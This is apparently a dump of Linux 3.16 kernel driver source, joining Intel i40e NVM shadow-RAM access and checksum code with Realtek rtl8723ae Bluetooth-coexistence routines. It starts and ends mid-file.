u16 offset;
u8 cut_msk;
u8 fab_msk:4;
u8 interface_msk:4;
u8 base:4;
u8 cmd:4;
u8 msk;
u8 value;
};
#define GET_PWR_CFG_OFFSET(__PWR_CMD) __PWR_CMD.offset
#define GET_PWR_CFG_CUT_MASK(__PWR_CMD) __PWR_CMD.cut_msk
#define GET_PWR_CFG_FAB_MASK(__PWR_CMD) __PWR_CMD.fab_msk
#define GET_PWR_CFG_INTF_MASK(__PWR_CMD) __PWR_CMD.interface_msk
#define GET_PWR_CFG_BASE(__PWR_CMD) __PWR_CMD.base
#define GET_PWR_CFG_CMD(__PWR_CMD) __PWR_CMD.cmd
#define GET_PWR_CFG_MASK(__PWR_CMD) __PWR_CMD.msk
#define GET_PWR_CFG_VALUE(__PWR_CMD) __PWR_CMD.value
bool rtlbe_hal_pwrseqcmdparsing(struct rtl_priv *rtlpriv, u8 cut_version,
u8 fab_version, u8 interface_type,
struct wlan_pwr_cfg pwrcfgcmd[]);
#endif
<|start_filename|>linux-3.16/drivers/net/ethernet/intel/i40e/i40e_nvm.c<|end_filename|>
/*******************************************************************************
*
* Intel Ethernet Controller XL710 Family Linux Driver
* Copyright(c) 2013 - 2014 Intel Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms and conditions of the GNU General Public License,
* version 2, as published by the Free Software Foundation.
*
* This program is distributed in the hope it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*
* The full GNU General Public License is included in this distribution in
* the file called "COPYING".
*
* Contact Information:
* e1000-devel Mailing List <<EMAIL>>
* Intel Corporation, 5200 N.E. El<NAME> Parkway, Hillsboro, OR 97124-6497
*
******************************************************************************/
#include "i40e_prototype.h"
/**
* i40e_init_nvm_ops - Initialize NVM function pointers
* @hw: pointer to the HW structure
*
* Setup the function pointers and the NVM info structure. Should be called
* once per NVM initialization, e.g. inside the i40e_init_shared_code().
* Please notice that the NVM term is used here (& in all methods covered
* in this file) as an equivalent of the FLASH part mapped into the SR.
* We are accessing FLASH always thru the Shadow RAM.
**/
i40e_status i40e_init_nvm(struct i40e_hw *hw)
{
struct i40e_nvm_info *nvm = &hw->nvm;
i40e_status ret_code = 0;
u32 fla, gens;
u8 sr_size;
/* The SR size is stored regardless of the nvm programming mode
* as the blank mode may be used in the factory line.
*/
gens = rd32(hw, I40E_GLNVM_GENS);
sr_size = ((gens & I40E_GLNVM_GENS_SR_SIZE_MASK) >>
I40E_GLNVM_GENS_SR_SIZE_SHIFT);
/* Switching to words (sr_size contains power of 2KB) */
nvm->sr_size = (1 << sr_size) * I40E_SR_WORDS_IN_1KB;
/* Check if we are in the normal or blank NVM programming mode */
fla = rd32(hw, I40E_GLNVM_FLA);
if (fla & I40E_GLNVM_FLA_LOCKED_MASK) { /* Normal programming mode */
/* Max NVM timeout */
nvm->timeout = I40E_MAX_NVM_TIMEOUT;
nvm->blank_nvm_mode = false;
} else { /* Blank programming mode */
nvm->blank_nvm_mode = true;
ret_code = I40E_ERR_NVM_BLANK_MODE;
hw_dbg(hw, "NVM init error: unsupported blank mode.\n");
}
return ret_code;
}
/**
* i40e_acquire_nvm - Generic request for acquiring the NVM ownership
* @hw: pointer to the HW structure
* @access: NVM access type (read or write)
*
* This function will request NVM ownership for reading
* via the proper Admin Command.
**/
i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
enum i40e_aq_resource_access_type access)
{
i40e_status ret_code = 0;
u64 gtime, timeout;
u64 time = 0;
if (hw->nvm.blank_nvm_mode)
goto i40e_i40e_acquire_nvm_exit;
ret_code = i40e_aq_request_resource(hw, I40E_NVM_RESOURCE_ID, access,
0, &time, NULL);
/* Reading the Global Device Timer */
gtime = rd32(hw, I40E_GLVFGEN_TIMER);
/* Store the timeout */
hw->nvm.hw_semaphore_timeout = I40E_MS_TO_GTIME(time) + gtime;
if (ret_code) {
/* Set the polling timeout */
if (time > I40E_MAX_NVM_TIMEOUT)
timeout = I40E_MS_TO_GTIME(I40E_MAX_NVM_TIMEOUT)
+ gtime;
else
timeout = hw->nvm.hw_semaphore_timeout;
/* Poll until the current NVM owner timeouts */
while (gtime < timeout) {
usleep_range(10000, 20000);
ret_code = i40e_aq_request_resource(hw,
I40E_NVM_RESOURCE_ID,
access, 0, &time,
NULL);
if (!ret_code) {
hw->nvm.hw_semaphore_timeout =
I40E_MS_TO_GTIME(time) + gtime;
break;
}
gtime = rd32(hw, I40E_GLVFGEN_TIMER);
}
if (ret_code) {
hw->nvm.hw_semaphore_timeout = 0;
hw->nvm.hw_semaphore_wait =
I40E_MS_TO_GTIME(time) + gtime;
hw_dbg(hw, "NVM acquire timed out, wait %llu ms before trying again.\n",
time);
}
}
i40e_i40e_acquire_nvm_exit:
return ret_code;
}
/**
* i40e_release_nvm - Generic request for releasing the NVM ownership
* @hw: pointer to the HW structure
*
* This function will release NVM resource via the proper Admin Command.
**/
void i40e_release_nvm(struct i40e_hw *hw)
{
if (!hw->nvm.blank_nvm_mode)
i40e_aq_release_resource(hw, I40E_NVM_RESOURCE_ID, 0, NULL);
}
/**
* i40e_poll_sr_srctl_done_bit - Polls the GLNVM_SRCTL done bit
* @hw: pointer to the HW structure
*
* Polls the SRCTL Shadow RAM register done bit.
**/
static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
{
i40e_status ret_code = I40E_ERR_TIMEOUT;
u32 srctl, wait_cnt;
/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
for (wait_cnt = 0; wait_cnt < I40E_SRRD_SRCTL_ATTEMPTS; wait_cnt++) {
srctl = rd32(hw, I40E_GLNVM_SRCTL);
if (srctl & I40E_GLNVM_SRCTL_DONE_MASK) {
ret_code = 0;
break;
}
udelay(5);
}
if (ret_code == I40E_ERR_TIMEOUT)
hw_dbg(hw, "Done bit in GLNVM_SRCTL not set\n");
return ret_code;
}
/**
* i40e_read_nvm_word - Reads Shadow RAM
* @hw: pointer to the HW structure
* @offset: offset of the Shadow RAM word to read (0x000000 - 0x001FFF)
* @data: word read from the Shadow RAM
*
* Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
**/
i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
u16 *data)
{
i40e_status ret_code = I40E_ERR_TIMEOUT;
u32 sr_reg;
if (offset >= hw->nvm.sr_size) {
hw_dbg(hw, "NVM read error: Offset beyond Shadow RAM limit.\n");
ret_code = I40E_ERR_PARAM;
goto read_nvm_exit;
}
/* Poll the done bit first */
ret_code = i40e_poll_sr_srctl_done_bit(hw);
if (!ret_code) {
/* Write the address and start reading */
sr_reg = (u32)(offset << I40E_GLNVM_SRCTL_ADDR_SHIFT) |
(1 << I40E_GLNVM_SRCTL_START_SHIFT);
wr32(hw, I40E_GLNVM_SRCTL, sr_reg);
/* Poll I40E_GLNVM_SRCTL until the done bit is set */
ret_code = i40e_poll_sr_srctl_done_bit(hw);
if (!ret_code) {
sr_reg = rd32(hw, I40E_GLNVM_SRDATA);
*data = (u16)((sr_reg &
I40E_GLNVM_SRDATA_RDDATA_MASK)
>> I40E_GLNVM_SRDATA_RDDATA_SHIFT);
}
}
if (ret_code)
hw_dbg(hw, "NVM read error: Couldn't access Shadow RAM address: 0x%x\n",
offset);
read_nvm_exit:
return ret_code;
}
/**
* i40e_read_nvm_buffer - Reads Shadow RAM buffer
* @hw: pointer to the HW structure
* @offset: offset of the Shadow RAM word to read (0x000000 - 0x001FFF).
* @words: (in) number of words to read; (out) number of words actually read
* @data: words read from the Shadow RAM
*
* Reads 16 bit words (data buffer) from the SR using the i40e_read_nvm_srrd()
* method. The buffer read is preceded by the NVM ownership take
* and followed by the release.
**/
i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
u16 *words, u16 *data)
{
i40e_status ret_code = 0;
u16 index, word;
/* Loop thru the selected region */
for (word = 0; word < *words; word++) {
index = offset + word;
ret_code = i40e_read_nvm_word(hw, index, &data[word]);
if (ret_code)
break;
}
/* Update the number of words read from the Shadow RAM */
*words = word;
return ret_code;
}
/**
* i40e_calc_nvm_checksum - Calculates and returns the checksum
* @hw: pointer to hardware structure
* @checksum: pointer to the checksum
*
* This function calculates SW Checksum that covers the whole 64kB shadow RAM
* except the VPD and PCIe ALT Auto-load modules. The structure and size of VPD
* is customer specific and unknown. Therefore, this function skips all maximum
* possible size of VPD (1kB).
**/
static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
u16 *checksum)
{
i40e_status ret_code = 0;
u16 pcie_alt_module = 0;
u16 checksum_local = 0;
u16 vpd_module = 0;
u16 word = 0;
u32 i = 0;
/* read pointer to VPD area */
ret_code = i40e_read_nvm_word(hw, I40E_SR_VPD_PTR, &vpd_module);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
/* read pointer to PCIe Alt Auto-load module */
ret_code = i40e_read_nvm_word(hw, I40E_SR_PCIE_ALT_AUTO_LOAD_PTR,
&pcie_alt_module);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
/* Calculate SW checksum that covers the whole 64kB shadow RAM
* except the VPD and PCIe ALT Auto-load modules
*/
for (i = 0; i < hw->nvm.sr_size; i++) {
/* Skip Checksum word */
if (i == I40E_SR_SW_CHECKSUM_WORD)
i++;
/* Skip VPD module (convert byte size to word count) */
if (i == (u32)vpd_module) {
i += (I40E_SR_VPD_MODULE_MAX_SIZE / 2);
if (i >= hw->nvm.sr_size)
break;
}
/* Skip PCIe ALT module (convert byte size to word count) */
if (i == (u32)pcie_alt_module) {
i += (I40E_SR_PCIE_ALT_MODULE_MAX_SIZE / 2);
if (i >= hw->nvm.sr_size)
break;
}
ret_code = i40e_read_nvm_word(hw, (u16)i, &word);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
checksum_local += word;
}
*checksum = (u16)I40E_SR_SW_CHECKSUM_BASE - checksum_local;
i40e_calc_nvm_checksum_exit:
return ret_code;
}
/**
* i40e_validate_nvm_checksum - Validate EEPROM checksum
* @hw: pointer to hardware structure
* @checksum: calculated checksum
*
* Performs checksum calculation and validates the NVM SW checksum. If the
* caller does not need checksum, the value can be NULL.
**/
i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
u16 *checksum)
{
i40e_status ret_code = 0;
u16 checksum_sr = 0;
u16 checksum_local = 0;
ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
if (ret_code)
goto i40e_validate_nvm_checksum_exit;
ret_code = i40e_calc_nvm_checksum(hw, &checksum_local);
if (ret_code)
goto i40e_validate_nvm_checksum_free;
/* Do not use i40e_read_nvm_word() because we do not want to take
* the synchronization semaphores twice here.
*/
i40e_read_nvm_word(hw, I40E_SR_SW_CHECKSUM_WORD, &checksum_sr);
/* Verify read checksum from EEPROM is the same as
* calculated checksum
*/
if (checksum_local != checksum_sr)
ret_code = I40E_ERR_NVM_CHECKSUM;
/* If the user cares, return the calculated checksum */
if (checksum)
*checksum = checksum_local;
i40e_validate_nvm_checksum_free:
i40e_release_nvm(hw);
i40e_validate_nvm_checksum_exit:
return ret_code;
}
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723ae/hal_btc.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
****************************************************************************
*/
#include "hal_btc.h"
#include "../pci.h"
#include "phy.h"
#include "../rtl8723com/phy_common.h"
#include "fw.h"
#include "../rtl8723com/fw_common.h"
#include "reg.h"
#include "def.h"
void rtl8723ae_bt_coex_off_before_lps(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
if (!rtlpcipriv->bt_coexist.bt_coexistence)
return;
if (ppsc->inactiveps) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BT][DM], Before enter IPS, turn off all Coexist DM\n");
rtlpcipriv->bt_coexist.cstate = 0;
rtlpcipriv->bt_coexist.previous_state = 0;
rtlpcipriv->bt_coexist.cstate_h = 0;
rtlpcipriv->bt_coexist.previous_state_h = 0;
rtl8723ae_btdm_coex_all_off(hw);
}
}
static enum _RT_MEDIA_STATUS mgnt_link_status_query(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_mac *mac = rtl_mac(rtl_priv(hw));
enum _RT_MEDIA_STATUS m_status = RT_MEDIA_DISCONNECT;
u8 bibss = (mac->opmode == NL80211_IFTYPE_ADHOC) ? 1 : 0;
if (bibss || rtlpriv->mac80211.link_state >= MAC80211_LINKED)
m_status = RT_MEDIA_CONNECT;
return m_status;
}
void rtl_8723e_bt_wifi_media_status_notify(struct ieee80211_hw *hw,
bool mstatus)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
u8 h2c_parameter[3] = {0};
u8 chnl;
if (!rtlpcipriv->bt_coexist.bt_coexistence)
return;
if (RT_MEDIA_CONNECT == mstatus)
h2c_parameter[0] = 0x1; /* 0: disconnected, 1:connected */
else
h2c_parameter[0] = 0x0;
if (mgnt_link_status_query(hw)) {
chnl = rtlphy->current_channel;
h2c_parameter[1] = chnl;
}
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40)
h2c_parameter[2] = 0x30;
else
h2c_parameter[2] = 0x20;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], FW write 0x19 = 0x%x\n",
h2c_parameter[0]<<16|h2c_parameter[1]<<8|h2c_parameter[2]);
rtl8723ae_fill_h2c_cmd(hw, 0x19, 3, h2c_parameter);
}
static bool rtl8723ae_dm_bt_is_wifi_busy(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (rtlpriv->link_info.busytraffic ||
rtlpriv->link_info.rx_busy_traffic ||
rtlpriv->link_info.tx_busy_traffic)
return true;
else
return false;
}
static void rtl8723ae_dm_bt_set_fw_3a(struct ieee80211_hw *hw,
u8 byte1, u8 byte2, u8 byte3,
u8 byte4, u8 byte5)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[5] = {0};
h2c_parameter[0] = byte1;
h2c_parameter[1] = byte2;
h2c_parameter[2] = byte3;
h2c_parameter[3] = byte4;
h2c_parameter[4] = byte5;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW write 0x3a(4bytes) = 0x%x%8x\n",
h2c_parameter[0], h2c_parameter[1]<<24 | h2c_parameter[2]<<16 |
h2c_parameter[3]<<8 | h2c_parameter[4]);
rtl8723ae_fill_h2c_cmd(hw, 0x3a, 5, h2c_parameter);
}
static bool rtl8723ae_dm_bt_need_to_dec_bt_pwr(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (mgnt_link_status_query(hw) == RT_MEDIA_CONNECT) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Need to decrease bt power\n");
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_DEC_BT_POWER;
return true;
}
rtlpcipriv->bt_coexist.cstate &= ~BT_COEX_STATE_DEC_BT_POWER;
return false;
}
static bool rtl8723ae_dm_bt_is_same_coexist_state(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
if ((rtlpcipriv->bt_coexist.previous_state ==
rtlpcipriv->bt_coexist.cstate) &&
(rtlpcipriv->bt_coexist.previous_state_h ==
rtlpcipriv->bt_coexist.cstate_h)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[DM][BT], Coexist state do not chang!!\n");
return true;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[DM][BT], Coexist state changed!!\n");
return false;
}
}
static void rtl8723ae_dm_bt_set_coex_table(struct ieee80211_hw *hw,
u32 val_0x6c0, u32 val_0x6c8,
u32 val_0x6cc)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6c0 = 0x%x\n", val_0x6c0);
rtl_write_dword(rtlpriv, 0x6c0, val_0x6c0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6c8 = 0x%x\n", val_0x6c8);
rtl_write_dword(rtlpriv, 0x6c8, val_0x6c8);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6cc = 0x%x\n", val_0x6cc);
rtl_write_byte(rtlpriv, 0x6cc, val_0x6cc);
}
static void rtl8723ae_dm_bt_set_hw_pta_mode(struct ieee80211_hw *hw, bool mode)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (BT_PTA_MODE_ON == mode) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE, "PTA mode on, ");
/* Enable GPIO 0/1/2/3/8 pins for bt */
rtl_write_byte(rtlpriv, 0x40, 0x20);
rtlpcipriv->bt_coexist.hw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE, "PTA mode off\n");
rtl_write_byte(rtlpriv, 0x40, 0x0);
}
}
static void rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(struct ieee80211_hw *hw,
u8 type)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (BT_RF_RX_LPF_CORNER_SHRINK == type) {
/* Shrink RF Rx LPF corner, 0x1e[7:4]=1111 ==> [11:4] by Jenyu*/
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Shrink RF Rx LPF corner!!\n");
rtl8723ae_phy_set_rf_reg(hw, RF90_PATH_A, 0x1e, 0xfffff,
0xf0ff7);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else if (BT_RF_RX_LPF_CORNER_RESUME == type) {
/*Resume RF Rx LPF corner*/
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Resume RF Rx LPF corner!!\n");
rtl8723ae_phy_set_rf_reg(hw, RF90_PATH_A, 0x1e, 0xfffff,
rtlpcipriv->bt_coexist.bt_rfreg_origin_1e);
}
}
static void rtl8723ae_bt_set_penalty_tx_rate_adap(struct ieee80211_hw *hw,
u8 ra_type)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 tmu1;
tmu1 = rtl_read_byte(rtlpriv, 0x4fd);
tmu1 |= BIT(0);
if (BT_TX_RATE_ADAPTIVE_LOW_PENALTY == ra_type) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Tx rate adaptive, set low penalty!!\n");
tmu1 &= ~BIT(2);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else if (BT_TX_RATE_ADAPTIVE_NORMAL == ra_type) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Tx rate adaptive, set normal!!\n");
tmu1 |= BIT(2);
}
rtl_write_byte(rtlpriv, 0x4fd, tmu1);
}
static void rtl8723ae_dm_bt_btdm_structure_reload(struct ieee80211_hw *hw,
struct btdm_8723 *btdm)
{
btdm->all_off = false;
btdm->agc_table_en = false;
btdm->adc_back_off_on = false;
btdm->b2_ant_hid_en = false;
btdm->low_penalty_rate_adaptive = false;
btdm->rf_rx_lpf_shrink = false;
btdm->reject_aggre_pkt = false;
btdm->tdma_on = false;
btdm->tdma_ant = TDMA_2ANT;
btdm->tdma_nav = TDMA_NAV_OFF;
btdm->tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm->fw_dac_swing_lvl = 0x20;
btdm->tra_tdma_on = false;
btdm->tra_tdma_ant = TDMA_2ANT;
btdm->tra_tdma_nav = TDMA_NAV_OFF;
btdm->ignore_wlan_act = false;
btdm->ps_tdma_on = false;
btdm->ps_tdma_byte[0] = 0x0;
btdm->ps_tdma_byte[1] = 0x0;
btdm->ps_tdma_byte[2] = 0x0;
btdm->ps_tdma_byte[3] = 0x8;
btdm->ps_tdma_byte[4] = 0x0;
btdm->pta_on = true;
btdm->val_0x6c0 = 0x5a5aaaaa;
btdm->val_0x6c8 = 0xcc;
btdm->val_0x6cc = 0x3;
btdm->sw_dac_swing_on = false;
btdm->sw_dac_swing_lvl = 0xc0;
btdm->wlan_act_hi = 0x20;
btdm->wlan_act_lo = 0x10;
btdm->bt_retry_index = 2;
btdm->dec_bt_pwr = false;
}
static void dm_bt_btdm_structure_reload_all_off(struct ieee80211_hw *hw,
struct btdm_8723 *btdm)
{
rtl8723ae_dm_bt_btdm_structure_reload(hw, btdm);
btdm->all_off = true;
btdm->pta_on = false;
btdm->wlan_act_hi = 0x10;
}
static bool rtl8723ae_dm_bt_is_2_ant_common_action(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct btdm_8723 btdm8723;
bool common = false;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
if (!rtl8723ae_dm_bt_is_wifi_busy(hw)
&& !rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi idle + Bt idle, bt coex mechanism always off!!\n");
dm_bt_btdm_structure_reload_all_off(hw, &btdm8723);
common = true;
} else if (rtl8723ae_dm_bt_is_wifi_busy(hw)
&& !rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi non-idle + Bt disabled/idle!!\n");
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.rf_rx_lpf_shrink = false;
btdm8723.reject_aggre_pkt = false;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
btdm8723.pta_on = true;
btdm8723.val_0x6c0 = 0x5a5aaaaa;
btdm8723.val_0x6c8 = 0xcccc;
btdm8723.val_0x6cc = 0x3;
btdm8723.tdma_on = false;
btdm8723.tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm8723.b2_ant_hid_en = false;
common = true;
} else if (rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Bt non-idle!\n");
if (mgnt_link_status_query(hw) == RT_MEDIA_CONNECT) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi connection exist\n");
common = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"No Wifi connection!\n");
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = false;
btdm8723.reject_aggre_pkt = false;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
btdm8723.pta_on = true;
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0x0000ffff;
btdm8723.val_0x6cc = 0x3;
btdm8723.tdma_on = false;
btdm8723.tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm8723.b2_ant_hid_en = false;
common = true;
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
if (common)
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_BTINFO_COMMON;
if (common && rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
return common;
}
static void rtl8723ae_dm_bt_set_sw_full_time_dac_swing(struct ieee80211_hw *hw,
bool sw_dac_swing_on,
u32 sw_dac_swing_lvl)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (sw_dac_swing_on) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], SwDacSwing = 0x%x\n", sw_dac_swing_lvl);
rtl8723_phy_set_bb_reg(hw, 0x880, 0xff000000,
sw_dac_swing_lvl);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], SwDacSwing Off!\n");
rtl8723_phy_set_bb_reg(hw, 0x880, 0xff000000, 0xc0);
}
}
static void rtl8723ae_dm_bt_set_fw_dec_bt_pwr(struct ieee80211_hw *hw,
bool dec_bt_pwr)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = 0;
if (dec_bt_pwr) {
h2c_parameter[0] |= BIT(1);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], decrease Bt Power : %s, write 0x21 = 0x%x\n",
(dec_bt_pwr ? "Yes!!" : "No!!"), h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x21, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_2_ant_hid(struct ieee80211_hw *hw,
bool enable, bool dac_swing_on)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
if (enable) {
h2c_parameter[0] |= BIT(0);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
if (dac_swing_on)
h2c_parameter[0] |= BIT(1); /* Dac Swing default enable */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn 2-Ant+HID mode %s, DACSwing:%s, write 0x15 = 0x%x\n",
(enable ? "ON!!" : "OFF!!"), (dac_swing_on ? "ON" : "OFF"),
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x15, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_tdma_ctrl(struct ieee80211_hw *hw,
bool enable, u8 ant_num, u8 nav_en,
u8 dac_swing_en)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 h2c_parameter[1] = {0};
u8 h2c_parameter1[1] = {0};
h2c_parameter[0] = 0;
h2c_parameter1[0] = 0;
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set BT PTA update manager to trigger update!!\n");
h2c_parameter1[0] |= BIT(0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TDMA mode ON!!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
if (TDMA_1ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_1ANT\n");
h2c_parameter[0] |= BIT(1);
} else if (TDMA_2ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_2ANT\n");
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Unknown Ant\n");
}
if (TDMA_NAV_OFF == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_NAV_OFF\n");
} else if (TDMA_NAV_ON == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_NAV_ON\n");
h2c_parameter[0] |= BIT(2);
}
if (TDMA_DAC_SWING_OFF == dac_swing_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_DAC_SWING_OFF\n");
} else if (TDMA_DAC_SWING_ON == dac_swing_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_DAC_SWING_ON\n");
h2c_parameter[0] |= BIT(4);
}
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set BT PTA update manager to no update!!\n");
